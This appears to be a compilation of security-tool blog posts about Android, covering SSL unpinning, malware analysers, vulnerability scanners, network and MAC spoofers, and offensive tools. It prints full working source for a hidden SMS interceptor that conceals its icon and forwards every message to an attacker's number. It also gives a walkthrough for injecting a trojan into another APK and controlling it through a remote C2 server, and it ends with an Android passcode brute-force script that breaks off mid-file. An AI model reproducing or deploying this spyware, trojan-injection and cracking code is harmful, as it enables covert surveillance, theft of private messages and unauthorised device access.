SSLUnpinning is a Android app to bypass SSL certificate validation (Certificate Pinning).
In high security enviroments SSL pinning is important as an additional security measure.

Description:
If you need intercept the traffic from one app who use certificate pinning, with a tool like Burp Proxy, the SSLUnpinning help you with this hard work! The SSLUnpinning through Cydia Substrate, make severous hooks in SSL classes to bypass the certificate verifications for one specific app, then you can intercept all your traffic.

Usage:
install Cydia Substrate in your test device (rooted device); https://play.google.com/store/apps/details?id=com.saurik.substrate
Download the APK available here https://github.com/ac-pm/SSLUnpinning or clone the project and compile;
Install SSLUnpinning.apk on a device with Cydia Substrate:

adb install SSLUnpinning.apk
SSLUnpinning will list the applications to choose from which will be bypassed;

Ok! Now you can intercept all traffic from the chosen app.
How to uninstall
adb uninstall SSLUnpinning.apk

Download :
SSLUnpinning.apk
Master.zip  | Clone Url
Source : https://github.com/ac-pm

androtools is Android malware static & dynamic analysis tool optimized for automated analysis. This work was motivated observing real-world needs for Police Officer and Malware Analysts who want to quickly check the malware’s specifics and detect type of Android malware briefly. This androtools supports Automated action in dynamic analysis which analyst don’t need to click button or activate & deactivate Device Admin. This total action only cost less then 1 minutes

Example Output Android Malware Analysis Report

Specifics about androtools:
– Automated click, button detection, activate & deactivate Device Admin from Device
– DEX class parse, string parse
– IP, Email, URL Searching in DEX, SO File
– APK File Similarity from user’s analysis history (fuzzyhash)
– APK Filetype Analysis
– AndroidManifest.xml Information
– Certification Information
– String XML Information
– Packet Data from Device
– Application Data Section Read & Write status
– Logcat Data when Application Run

User Guide
How to use :
1. git clone https://github.com/bunseokbot/androtools.git
2. python androtools.py <APK_MALWARE_FILE_PATH> <OUTPUT_HTML_PATH> Analysis Complete!

Pre-Install :
analyst have to install tcpdump in Android Virtual Device and ssdeep in Environment. or

Download : Master.zip (1.7 MB)  | Clone Url
Source : https://github.com/bunseokbot | androtools – developer Kim Namjun(@bunseokbot)

Maldrolyzer is a Simple framework to extract “actionable” data from Android malware (C&Cs, phone numbers etc.)
Changelog 30.03.2015 :
+ Templates.py ; Modules
+ maldrolyzer.py ; Reorganization + xbot007 decoder
+ Plugin ; xbot007 plugin now covers the ‘%’ version

Installation:
You have to install the following packets before you start using this project:
+ Androguard (https://github.com/androguard/androguard)
+ PyCrypto (easy_install pycrypto)
+ pyelftools (easy_install pyelftools)

Architecture :
Idea is really simple and modular. The project has couple of directories, which host a place for you static analysis or output processing:
+ plugins – this is were the code responsible for the malware identification and data extraction is. Every class has to inherit from Plugin class from templates. ** Method recon idetifies the malware – put there all of the code you need to make sure you can extract the data. ** Method extract does the usual extraction. There is no specific format for the extracted data, but it’s good to keep it in Python dictionary, so that the ouput processors could read it in a uniform way.
+ processing – this is were you put classes that inherit from OutputProcessor class. They are invoked after the data extraction and get the extracted info. ** process method takes the data and produces some kind of a result (i.e. adds a file or C&C to you database, checks if the C&C is live etc.)
If you want to contribute, write a plugin that decodes some new malware family. It’s easy, just look at the existing plugins.

Usage :
So, you have an APK sample and you don’t know what it is and where is the C&C? Type:

python maldrolyzer.py [sample_path]

If maldrolyzer knows the malware family it will display some useful information like:

{'c2': ['http://esaphapss.net/bn/save_message.php'],
 'malware': 'xbot007',
 'md5': 'ce17e4b04536deac4672b98fbee905e0',
 'sha1': 'a48a2b8a5e1cae168ea42bd271f5b5a0c65f59a9',
 'sha256': 'c3a24d1df11baf2614d7b934afba897ce282f961e2988ac7fa85e270e3b3ea7d',
 'sha512': 'a47f3db765bff9a8d794031632a3cf98bffb3e833f90639b18be7e4642845da2ee106a8947338b9244f50b918a32f1a6a952bb18a1f86f8c176e81c2cb4862b9'}

Download : Master.zip  | Clone Url
Source : https://github.com/maldroid

Patrol is A platform for testing an Android device’s applications for IPC-related vulnerabilities.
Network Protocol notes:
+in this scenario, a report is associated with login that is verified on the remote server
+the password is the symmetric key used to encrypt/decrypt the file
+login.py is called from choose.py, login.py does the network auth and encryption

Patrol Flow -How to work?

Sending data:
+ User (client software) sends username,password,and json of data all wrapped in TLS
+ Server (remote) checks if username and password exist, if they do, then insert JSON stuff into db

Local notes:
+in this scenario, the report is imported from the software client, and is associated with just a passphrase
+the passphrase is the symmetric key used to encrypt/decrypt the file
+local.py is called from choose.py, local.py prompts for a passphrase and encrypts

DEPENDENCIES :
– SIP (dep for PyQT) Need python-dev (apt-get install python-dev) http://pyqt.sourceforge.net/Docs/sip4/installation.html#building -python configure.py -make -sudo make install
– Get QT stuff: sudo apt-get install qt5-default qttools5-dev-tools
– PyQT5 http://pyqt.sourceforge.net/Docs/PyQt5/installation.html -python configure.py

Download : Master.zip  | Clone Url
Source : https://github.com/ehrenb

Changelog v-2.3.0:

+ Experimental Lollipop 5.1 support
+ Fixed the blue ball machine
+ Added “Generate device report” – allows device info to be emailed to developers for easier support.
Network Spoofer lets you change websites on other people’s computers from an Android phone.

Features include:
+ Flip pictures upside down
+ Flip text upside down
+ Make websites experience gravity
+ Redirect websites to other pages
+ Delete random words from websites
+ Replace words on websites with others
+ Change all pictures to Trollface
+ Wobble all pictures / graphics around a bit

Network Spoofer lets you change websites on other people’s computers from an Android phone.

Disclaimer:
Please note that there is no intention for Network Spoofer to include any malicious features. This application is a fun demonstration of how vulnerable home networks are to simple attacks, with permission of the network owner – DO NOT attempt to use Network Spoofer on any corporate or other non-residential networks (eg. at school, university). It becomes very obvious when Network Spoofer is being used on a Network, and use of Network Spoofer will be considered malicious hacking by network administrators.

Requirements
Network Spoofer runs on Android devices with the following requirements:
– Which are rooted (‘su’).
– Which has Wifi
The first can be obtained by using a custom firmware such as CyanogenMod. Alternatively search on the internet for instructions on how to root your phone.

Download:
android-netspoof-2.3.0.apk (3.99 MB) | Zipball | Tarball
Source : http://www.digitalsquid.co.uk/netspoof/
Old post: http://seclist.us/updates-android-network-spoofer-v-2-2-0.html

Android-MAC-Spoofer is a Spoof the MAC address of your rooted Android device from Windows. Changes are persistent accross reboots. Tool allows backup of the original MAC.

Requirements:
1. (Required) Rooted Android device
2. (Required) Go to Developer Options on your device and allow “USB Debugging” mode
3. (Required) Make sure device driver is installed on Windows
4. (Recommended) Download the Android SDK and set the environment variable “ANDROID_HOME” to the root directory of the SDK. ..* This script relies on the Android Debug Bridge (adb). By default, it will look for “adb.exe” on %ANDROID_HOME%\platform-tools\adb.exe. If not found, it will run the “adb.exe” bundled with this script, which should work for Windows x64 machines

Usage :
Connect your Android device, and run

android-spoofer.bat <mode> [new-mac-address]
Where <mode> 
     update: Sets MAC address to be equal to 'new-mac-address'. Backup is created, if non-existent.
     backup: Backs-up current MAC-address
     restore: Restores original MAC-address
     clean-backup: [DANGEROUS] Cleans backed-up address (cannot be undone
     show-current: Displays current MAC address.
     show-original: Displays backed-up MAC address, in case it exists.

NOTE : Anytime the MAC address is modified, the device needs to be rebooted for changes to take effect.

Tips : Try running the following command

android-spoofer.bat show-current

No changes are made by this command, and if everything has been correctly set up, it should display the current MAC address of your device.

Download : Master.zip  | Clone Url
Source : https://github.com/marcojrfurtado

This is a tool to analyze android, linux and windows, to detect points to attack, as intents, receivers, services, processes and libraries.
This tool uses a static analysis methods to do this, the vector attack founded by this tool, can be attacked by fuzzing methods to discover vulnerabilities..
More security researchers, bug hunters, exploit writers, malware developers find a problems as unsecure compilation flags, methods/functions exposes, with this tool is more easy, this tool search by you automatically.

It is well known in the world of IT Security, that have been created countermeasures and memory protections to prevent easily create exploits and prevent programmers to write programs that execute arbitrary code, as RELRO, PAX, ASLR, PIE, NX, SSP, StackCanary and others, this tool search this flags to do the job.
For now this tool only check ELF Binary Format, searching RELRO, PAX, PIE, ASLR, NX, RPATH, RUNPATH, StackCanary and FORTIFY SOURCE protections.

Download : Master.zip  | Clone Url
Source : http://about.me | https://github.com/JhetoX

Chagelog 04/06/2015:
– Initial Crash Report about com.whatsapp
– New UI
– Features list

This is a tool to analyze android, linux and windows, to detect points to attack, as intents, receivers, services, processes and libraries.
This tool uses a static analysis methods to do this, the vector attack founded by this tool, can be attacked by fuzzing methods to discover vulnerabilities..
More security researchers, bug hunters, exploit writers, malware developers find a problems as unsecure compilation flags, methods/functions exposes, with this tool is more easy, this tool search by you automatically.

Preview: Vector Attack Scanner for Android

It is well known in the world of IT Security, that have been created countermeasures and memory protections to prevent easily create exploits and prevent programmers to write programs that execute arbitrary code, as RELRO, PAX, ASLR, PIE, NX, SSP, StackCanary and others, this tool search this flags to do the job.
For now this tool only check ELF Binary Format, searching RELRO, PAX, PIE, ASLR, NX, RPATH, RUNPATH, StackCanary and FORTIFY SOURCE protections.

Vector Attack Scanner: new UI

Features about this project:
– Analysis apk and so/elf
– Extract apk and so/elf
– Scanner AIDL (Android Interface Definition Language)
– Analysis ssl pining and man in the middle
– Disassemble resources and sources
– Mapping classes, methods and imports
– Analysis backendless (MBaaS – Mobile Backend As A Service) libs
– Analysis Network traffic
– Analysis crash on classes
– CA certificates extractor, APK embedded certificates and Url certificate catcher.
– Analysis cryptografic API’s
– Analysis intent filters
– Analysis file system permissions
– Analysis SH (Shell Scripts)
– Analysis webview xss and injections.
– Crash log view
– Dinamic code injection
– Fuzzing on intents and native libs (SO/ELF)
– Hooking native libs / java libs / JNI libs
– Analysis framework
– Url certificate catcher
– Analisys of reflexing code
– Shellcode detector
– Analysis apps vulnerable to cloning cards
– Scanner unsecure storage
– Hooking passing intents

Download : Master.zip  | Clone Url | Our Post Before
Source : http://about.me | https://github.com/JhetoX

If you ever have looked at Android applications you know to appreciate the ability of analyzing your target at the most advanced level. Dynamic program analysis will give you a pretty good overview of your applications activities and general behaviour. However sometimes you’ll want to just analyze your application without running it. You’ll want to have a look at its components, analyze how they interact and how data is tainted from one point to another.
This is was the major factor driving the development of smalisca. There are indeed some good reasons for a static code analysis before the dynamic one. Before interacting with the application I like to know how the application has been build, if there is any API and generate all sort of call flow graphs. In fact graphs have been very important to me since they visualize things. Instead of jumping from file to file, from class to class, I just look at the graphs.
While graph building has been an important reason for me to code such a tool, smalisca has some other neat features you should read about.

Search for classes using interactive prompt

Changelog v-0.2 :
Bugs:
+ Fixed issue #2
+ Fixed issue #3
+ Fixed issue described in pull #5
Parsing :
+ Added concurrency to the parser
+ You can specify by “-j” the number of jobs/workers
Configuration :
+ Added configuration files
+ Specify configuration file by “-c” parameter
Web API :
+ Added REST API to access the SQLite DB
+ Use http://<host>:<port>/api/<table name> to access JSON data
Based on Flask and Flask Restless

General help / usage

Installation :
Refer to the installation page. Requirements:
+ Python (2.x / 3.x)
+ cement
+ Graphviz
+ SQLAlchemy

Features :
At the moment there are some few major functionalities like:
+ parsing
You can parse a whole directory of Smali files and extract:
— class information
— class properties
— class methods
— calls between methods of different classes
— You can then export the results as JSON or SQLite.
Have a loot at the parsing page for more information.

+ analyzing
After exporting the results you’ll get an interactive prompt to take a closer look at your parsed data. You can search for classes, properties, methods and even method calls. You can then apply several filters to your search criterias like:

smalisca> sc -c class_name -p test -r 10 -x path -s class_type
This command will search for 10 (-r 10) classes which contain the pattern test (-p) in their class name (-c). Afterwards the command will exclude the column path (-x path) from the results and sort them by the class type (-s).
Let’s have a look at another example:

smalisca> scl -fc com/android -fm init -r 10
This will search for all method calls whose calling class name contains the pattern com/android (-fc). Additionally we can look for calls originating from methods whose name contain the pattern init (-fm).
You can of course read your commands from a file and analyze your results in a batch- like manner:

$ cat cmd.txt
sc -c class_name -p com/gmail/xlibs -r 10 -x path
quit
$ ./smalisca.py analyzer -i results.sqlite -f sqlite -c cmd.txt
…
Have a loot at the analysis page for more information.

+ web API
smalisca provides a REST web service in order to easily interact with the results by just using a web client. This way you can access data in your own (fancy) web application and have a clean separation between backend and frontend.
Read more about the available REST API at the web API page.

+ visualizing
I think this the most valuable feature of smalisca. The ability to visualize your results in a structured way makes your life more comfortable. Depending on what you’re interested in, this tool has several graph drawing features I’d like to promote.
At first you can draw your packages including their classes, properties and methods:

smalisca> dc -c class_name -p test -f dot -o /tmp/classes.dot
:: INFO Wrote results to /tmp/classes.dot
smalisca>
This will first search classes whose class name contains test and then export the results in the Graphviz DOT language. You can then manually generate a graph using dot, neato, circo etc. Or you do that using the interactive prompt:

smalisca> dc -c class_name -p test -f pdf -o /tmp/classes.pdf –prog neato
:: INFO Wrote results to /tmp/classes.pdf
smalisca>
Have a loot at the drawing page for more information.

Download : 0.2.zip  | 0.2.tar.gz
Source : https://github.com/dorneanu

This tool was meant to show the end user the attack surface that a given device is susceptible to. In implementing these checks we attempt to minimize or eliminate both false positives/false negatives without negatively affecting system stability.

hammerhead-user 5.1.1 LMY48I 2074855 release-keys

Latest Change 9/14/2015:
– Bunary and Application/App; Add header + some links for the x509 serialization bug.
– Update buildscript.

Rationale for necessity:
When a vulnerability is discovered, Google receives word and applies a patch to Android. The Nexus devices are usually the devices that receive these patches quickest as they deviate the least (read: not at all) from AOSP (Android Open Source Project – The core of Android, where Google commits to). The lag time between learning about a bug and the time when a patch is applied to a device can still be significant (for OEMs, it can be > 1 year or never). For example, the futex bug (CVE-2014-3153/Towelroot) was known about in late May, early June. This bug is still not patched on my latest Nexus 5 (Android 4.4.4). This leaves users extremely vulnerable to attack from applications. Users mostly do not know that their devices are vulnerable and this tool is meant to give visibility into the vulnerabilities a given device is susceptible to.

Lifecycle of a patch:
Samsung, HTC, and every other OEM keep heavily customized versions of Android. The patch deployment infrastructure from OEMS -> carriers -> users is in disarray. The OEMs receive the patches from Google and spend weeks or months applying these to some devices and testing. Then they ship off the device updates to the carrier who is responsible for pushing them to the end user. They then go through another QA cycle from the carrier.

Implementation :
Vulnerabilities in a device can exist at many layers inside of Android. For example, a bug can exist in the kernel (Towelroot, for example) or it can exist in the Android specific framework (Android Masterkeys/FakeID). Some of the kernel bugs can sometimes be difficult to check for without potentially causing system instability. This implementation takes care to not include checks that could cause instability problems for the end user and therefore may omit checks that could cause these types of issues. The framework is very thin at the current time and consists of a vector of vulnerability checks. Their concrete implementations vary wildly depending on the bug.
A list of current bug checks:
+ ZipBug9950697
+ Zip Bug 8219321 / Master keys
+ Zip Bug 9695860
+ Jar Bug 13678484 / Android FakeID
+ CVE 2013-6282 / put/get_user
+ CVE_2011_1149 / PSNueter / Ashmem Exploit
+ CVE_2014_3153 / Futex bug / Towelroot
+ CVE 2014-3847 / WeakSauce
+ StumpRoot
+ Stagefright bugs
+ x509 Serialization bug

Previous work:
There have been attempts before to solve this issue. xray.io Xray works by actually attempting the exploit which doesn’t satisfy our system stability constraint. There also exist other applications which attempt to determine a devices attack surface by simply using a lookup based on Android verison/build information. This causes both false negatives and false positives. Imagine the case where an OEM has back ported a fix to a device, but the check solely relies on an Android device; false positive. The case where an OEM upgrades to an Android version/kernel version which includes patches, but manages to break them causes the case of a false negative.

ZTE-Compel-4.4.2

Download : android-vts.zip(1.1 MB)
Source : https://github.com/nowsecure

Quick Android Review Kit – This tool is designed to look for several security related Android application vulnerabilities, either in source code or packaged APKs. The tool is also capable of creating “Proof-of-Concept” deployable APKs and/or ADB commands, capable of exploiting many of the vulnerabilities it finds. There is no need to root the test device, as this tool focuses on vulnerabilities that can be exploited under otherwise secure conditions.

Latest Change 9/25/2015:
– qark.py : resolved error when attempting to incorrectly run .replace on list items
Requirements
+ python 2.7.6
+ JRE 1.6+ (preferably 1.7+)
+ OSX or Ubuntu, debian & Kali Linux

Quick Android Review Kit – This tool is designed to look for several security related Android application vulnerabilities, either in source code or packaged APKs.

QARK is an easy to use tool capable of finding common security vulnerabilities in Android applications. Unlike commercial products, it is 100% free to use. QARK features educational information allowing security reviewers to locate precise, in-depth explanations of the vulnerabilities. QARK automates the use of multiple decompilers, leveraging their combined outputs, to produce superior results, when decompiling APKs. Finally, the major advantage QARK has over traditional tools, that just point you to possible vulnerabilities, is that it can produce ADB commands, or even fully functional APKs, that turn hypothetical vulnerabilities into working “POC” exploits.
Included in the types of security vulnerabilities this tool attempts to find are:
– Inadvertently exported components
– Improperly protected exported components
– Intents which are vulnerable to interception or eavesdropping
– Improper x.509 certificate validation
– Creation of world-readable or world-writeable files
– Activities which may leak data
– The use of Sticky Intents
– Insecurely created Pending Intents
– Sending of insecure Broadcast Intents
– Private keys embedded in the source
– Weak or improper cryptography use
– Potentially exploitable WebView configurations
– Exported Preference Activities
– Tapjacking
– Apps which enable backups
– Apps which are debuggable
– Apps supporting outdated API versions, with known vulnerabilities

Installation:

git clone https://github.com/linkedin/qark
cd qark
python qark.py

Usage:
$ python qark.py --source 1 --pathtoapk /Users/foo/qark/sampleApps/goatdroid/goatdroid.apk --exploit 1 --install 1
or
$ python qark.py --source 2 -c /Users/foo/qark/sampleApps/goatdroid/goatdroid --manifest /Users/foo/qark/sampleApps/goatdroid/goatdroid/AndroidManifest.xml --exploit 1 --install 1

Source : https://github.com/linkedin

Android-SMS-Interceptor is a A hidden android SMS interceptor that forwards every message.
This is just a proof of concept and i’m not responsible for any damage caused by its usage.

EDIT: After the update of android 4.2 the applications needs to be registered as the “Default SMS application” in order to work.
AndroidManifest.xml Script:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.interceptor"
    android:versionCode="1"
    android:versionName="1.0" >
    
        <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> 
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.WRITE" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.WRITE_SMS" />

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="21" />

    <application
        android:allowBackup="true"
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
		android:theme="@android:style/Theme.NoDisplay">
        <activity
            android:name=".MainActivity"
            android:label="@string/app_name" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>                                        
        </activity>
        
        
<receiver
    android:name=".SmsReceiver"
    android:enabled="true"
    android:exported="true"
    android:label="SmsReceiver">
    <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"></action>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"></action>
    </intent-filter>
</receiver>
        
        
    </application>

</manifest>

MainActivity.java Script:

package com.example.interceptor;

import android.os.Bundle;
import android.widget.Toast;
import android.app.Activity;
import android.content.pm.PackageManager;

public class MainActivity extends Activity {

	@Override
	protected void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
		setContentView(R.layout.activity_main);

		PackageManager p = getPackageManager();
		p.setComponentEnabledSetting(getComponentName(), PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);
	}

}

SmsReceiver.java Script:

package com.example.interceptor;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;

import java.io.BufferedReader;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;

import android.telephony.SmsManager;
import android.telephony.SmsMessage;
import android.widget.Toast;


public class SmsReceiver  extends BroadcastReceiver {

    @Override
    public void onReceive(Context context, Intent intent) {
    	
        if(intent.getAction().equals("android.provider.Telephony.SMS_RECEIVED")){
            Bundle bundle = intent.getExtras();   
            SmsMessage[] msgs = null;
            String msg_from;
            if (bundle != null){
			
                // retrieve the SMS message received
                try{
                    Object[] pdus = (Object[]) bundle.get("pdus");
                    msgs = new SmsMessage[pdus.length];

                        msgs[0] = SmsMessage.createFromPdu((byte[])pdus[0]);
                        msg_from = msgs[0].getOriginatingAddress();
                        String msgBody = msgs[0].getMessageBody();
                        
						//for testing purposes uncomment the two lines below
                        //Toast.makeText(context, msg_from, Toast.LENGTH_LONG).show();  //the sender's phone number
                        //Toast.makeText(context, msgBody, Toast.LENGTH_LONG).show();   //the message
                        
	        			String data = null;
	        			try {
	        				String FILENAME = "file";
	        				FileInputStream fis = context.getApplicationContext().openFileInput(FILENAME);        //read file
	        				InputStreamReader in = new InputStreamReader(fis);
	        				BufferedReader br = new BufferedReader(in);
	        				data = br.readLine();
	        			} catch (IOException e) {
	        				data = "dd";	
	        			}
                        
	        			if(data.matches("ee")){	        			
	        				if ( (msg_from.contains("PUT_A_PHONE_NUMBER_THAT_YOU_WANT_TO_BE_IGNORED") == false) && (msg_from.contains("CALLS") == false) ){
	        					try {
	        						SmsManager smsManager = SmsManager.getDefault();
	        						smsManager.sendTextMessage("PUT_YOUR_PHONE_NUMBER_HERE", null, "From: " + msg_from + ":" + msgBody, null, null);
	        					} catch (Exception e) {
	        						//e.printStackTrace();
	        					}
	        				}
	        			}
                        
                        if (msgBody.contains("PUT_SOME_SECRET_CHARACTERS_THAT_WILL_DISABLE_THE_APP_WHEN_RECEIVED")==true){	
                    		String FILENAME = "file";
                    		String string = "dd";
                    		
                    		//Toast.makeText(context, "disabled", Toast.LENGTH_LONG).show();  //---------------------------------
                    		try {
                    			FileOutputStream fos = context.getApplicationContext().openFileOutput(FILENAME, Context.MODE_PRIVATE);    // write settings file
                    			fos.write(string.getBytes());
                    			fos.close();
                    		} catch (IOException e1) {
                    			//Toast.makeText(context, e1.getMessage(), Toast.LENGTH_LONG).show();
                    		}
                        	
                        }
                        
                        
                        if (msgBody.contains("PUT_SOME_SECRET_CHARACTERS_THAT_WILL_ENABLE_THE_APP_WHEN_RECEIVED")==true){
                        	
                    		String FILENAME = "file";
                    		String string = "ee";
                    		//Toast.makeText(context, "ee", Toast.LENGTH_LONG).show();  //---------------------------------
                    		try {
                    			FileOutputStream fos = context.openFileOutput(FILENAME, Context.MODE_PRIVATE);    // write settings file
                    			fos.write(string.getBytes());
                    			fos.close();
                    		} catch (IOException e1) {
                    			//Toast.makeText(context, e1.getMessage(), Toast.LENGTH_LONG).show();
                    		}
                        	
                        }
                   // }
                }catch(Exception e){
                            //Log.d("Exception caught",e.getMessage());
                }
            }
        }
    }
}

Source : https://github.com/vipersec

Changelog v-2.4.0 10/16/2015:
+ Added better root checks.
Many users complained that Network Spoofer didn’t work on Android 5.1. Most had root disabled. This adds extra checks.

Network Spoofer lets you change websites on other people’s computers from an Android phone.

Features include:
+ Flip pictures upside down
+ Flip text upside down
+ Make websites experience gravity
+ Redirect websites to other pages
+ Delete random words from websites
+ Replace words on websites with others
+ Change all pictures to Trollface
+ Wobble all pictures / graphics around a bit

Network Spoofer lets you change websites on other people’s computers from an Android phone.

Disclaimer:
Please note that there is no intention for Network Spoofer to include any malicious features. This application is a fun demonstration of how vulnerable home networks are to simple attacks, with permission of the network owner – DO NOT attempt to use Network Spoofer on any corporate or other non-residential networks (eg. at school, university). It becomes very obvious when Network Spoofer is being used on a Network, and use of Network Spoofer will be considered malicious hacking by network administrators.

Requirements
Network Spoofer runs on Android devices with the following requirements:
– Which are rooted (‘su’).
– Which has Wifi
The first can be obtained by using a custom firmware such as CyanogenMod. Alternatively search on the internet for instructions on how to root your phone.

Download:
android-netspoof-2.4.0.apk | Zipball | Tarball
Source : http://www.digitalsquid.co.uk/netspoof/
Old post: http://seclist.us/updates-android-network-spoofer-v-2-3-0.html

Notice : This post just For Education Purpose Only! the purpose: How to Infect and Inject trojan into APK File, and re-upload on your server or google play store using MiTM.

This project was to make a simple trojan app, to get information from the phone or to perform some remote action with the phone (send sms …). the second part was to inject this trojan into another app package (APK), so the trojan can be quietly install without the user noticing.

Dependencies; three repo are parts of this project :
– the trojan app, made with android studio : https://github.com/remijouannet/trojandroid_app
– the server part, to talk with the trojan : https://github.com/remijouannet/trojandroid_server
– the script to inject the trojan into an APK : https://github.com/remijouannet/trojandroid_mixapk
– get10 : https://github.com/remijouannet/get10

+ trojandroid_app
The first thing to do is to open the project with android studio :
git clone git@github.com:remijouannet/trojandroid_app.git
Try to build the app and launch it on your phone. this app don’t use any java library who isn’t include in the android SDK to avoid error when it will be inject in other app. The Trojan configuration is hardcode to avoid the dependence with any external XML.
So you’re gonna have to modify the code yourself if you want to test it. the only code to modify is in trojan.android.android_trojan.action, modify the following code in the class ConnectionServerThread
this.host = “pi.remijouannet.com”; //IP or domain name of the Trojan server
You can modify the “port” variable if you want, but it isn’t recommended, you can have some errors with a non standard port for https.

Run the app on your phone or on the emulator (MaJ+F10), the generate APK will be use later.
app/build/outputs/apk/app-debug.apk
the app is pretty simple, it’s just an infinity loop in a background service who ask every 4000 seconds to the Trojan server if he had to do something, if he had he try to do it and send the result to the Trojan app, the service is relaunch every time the user unlock his phone.

+ trojandroid_mixapk
So this is a python script who use the wonderful APKTOOL to inject the trojan into another APK.
the script unpack the two APK, copy and modify the smali code of the trojan into get10 package, a few modification in the manifest is of course necessary, after this get10 can be repack, install and use without any problem.

Mixapk : Client

So you have to have the Trojan APK and an APK of another app (get10 for this example) (a little howto I find to extract an installed app of your phone)
# ./adb shell pm list packages | grep get10

package:com.remijouannet.get10
# ./adb shell pm path com.remijouannet.get10

package:/data/app/com.remijouannet.get10-1/base.apk
# ./adb pull /data/app/com.remijouannet.get10-1/base.apk && mv base.apk /tmp/

7544 KB/s (3117111 bytes in 0.403s)
# mixapk.py –apks /PathTotrojandroid_app/app/build/outputs/apk/app-debug.apk /tmp/base.apk

let’s do the magic. if you didn’t have any errors, you should find a file “app-final.pak” in your current directory.
if you have your phone in debug mode, you can push the apk to it with a simple adb command:
# adb install app-final.apk

+ trojandroid_server
the last component of the project, it’s a simple flask script who expose webservice to interact with the trojan.
the trojan launch a background service who’s gonna call the webservice continually to see if their is action to execute (send a sms, get the mac address …), if an order,is given to the trojan, the answer is send from the trojan to the server to an another webservice.

trojandroid_server Configuration

per default, the android trojan use https, so you have to use the script ssl.sh in the repo to generate private/public key, after that you can just launch a command to get information from the trojan.
example to get the mac adress:

sudo androidtrojan -s /home/pi/git/trojandroid_server/ssl/ --mac -v

 * Running on https://192.168.1.36:443/ (Press CTRL+C to quit)
 * Restarting with stat
192.168.1.50 - - [08/Jul/2015 19:38:44] "GET /action HTTP/1.1" 200 -
192.168.1.50 f8:e0:79:ab:8c:88
f8:e0:79:ab:8c:88
192.168.1.50 - - [08/Jul/2015 19:38:45] "POST /result HTTP/1.1" 200 -

Source : https://github.com/remijouannet

AndroidPINCrack is a Python script that bruteforce the Android Passcode given the hash and salt. Of course there are some other faster ways to crack than a python script, but it can be useful for numeric passcoders or wordlist attack.

Bruteforce the Android Passcode given the hash and salt.

Script:

#!/usr/bin/python
# Android Hash Cracker
# Jose Selvi - jselvi[a.t]pentester[d0.t]es - http://www.pentester.es
# Version 0.2 - 05/May/2013
# 	- Fixed problems in hex() at Python 2.6 (thanks @ldelgadoj)

# Libraries
from optparse import OptionParser
from itertools import product
import hashlib
from binascii import hexlify

# Charsets
CHARSET_NUMERIC = "0123456789"
CHARSET_ALPHA = "abcdefghijklmnopqrstuvwxyz."
CHARSET_ALPHANUMERIC = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
CHARSET_FULL = """ !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"""

# Android Default Hashing Algorithm
def hashDefault(passcode,salt):
	salted_passcode = passcode + salt
	guess_digest = hashlib.sha1(salted_passcode).digest()
	guess_hash = hexlify( guess_digest ).upper()
	return guess_hash

# Special Samsung Hashung Algorithm
def hashSamsung(passcode,salt):
	salted_passcode = passcode + salt
	buf=str()
	for i in range(1024):
		step_string = str(buf) + str(i) + salted_passcode
		buf = hashlib.sha1( step_string ).digest()
	return hexlify(buf).upper()

# Generate Hash
def generateHash(passcode,salt,model):
	if model == "SAMSUNG":
		return hashSamsung(passcode,salt)
	else:
		return hashDefault(passcode,salt)

###
### Main
###

# Get Parameters
usage = "usage: %prog [options]"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--hash", type="string", dest="hash", help="password.key hash")
parser.add_option("-s", "--salt", type="int", dest="salt", help="Hash salt")
parser.add_option("-m", "--model", type="choice", dest="model", choices=['default','samsung'], default="default", help="Android Version/Model")
parser.add_option("-c", "--charset", type="choice", dest="charset", choices=['numeric','alpha', 'alphanumeric','full'], default="numeric", help="Password charset to test (default=numeric)")
parser.add_option("-l", "--length", type="int", dest="length", default=4, help="Passcode max length (default=4)")
parser.add_option("-w", "--wordlist", type="string", dest="wordlist_file", help="wordlist file")
(options, args) = parser.parse_args()
if not options.hash or not options.salt:
        parser.print_help()
        exit()

# Check lenght
if options.length < 4:
	print "Error! Min passcode len in Android is 4!"
	exit()
if options.length > 16:
	print "Error! Max passcode len in Android is 16!"
	exit()
if options.length > 6:
	print "Maybe you should use a faster tool such as Hashcat... but let's move on!"

# Split hashes
HASH_SHA1 = options.hash.upper()[:40]
HASH_MD5 = options.hash.upper()[41:]

# From Numeric Salt to Hex (len should be 8?)
#SALT = hex(options.salt).lstrip('0x').rstrip('L').zfill(8)
SALT = hex(options.salt).lstrip('0x').rstrip('L')

# Get Charset
if options.charset == 'numeric':
	CHARSET = CHARSET_NUMERIC
elif options.charset == 'alpha':
	CHARSET = CHARSET_ALPHA
elif options.charset == 'alphanumeric':
	CHARSET = CHARSET_ALPHANUMERIC
elif options.charset == 'full':
	CHARSET = CHARSET_FULL
else:
	CHARSET = CHARSET_NUMERIC

# Get Model
MODEL = options.model.upper()

try:
	# Generate Passcodes
	if not options.wordlist_file:
		for l in range(3, options.length):
			for passcode in product(CHARSET, repeat=l+1):
				passcode = "".join([x for x in passcode])
				# GenerateHash
				GUESS_HASH = generateHash( passcode, SALT, MODEL )
				# CompareHash
				if GUESS_HASH == HASH_SHA1:
					print "Found! Passcode = " +  passcode
					exit()
	# Or using wordlist
	else:
		for passcode in open(options.wordlist_file):
			passcode = passcode.rstrip()
			# GenerateHash
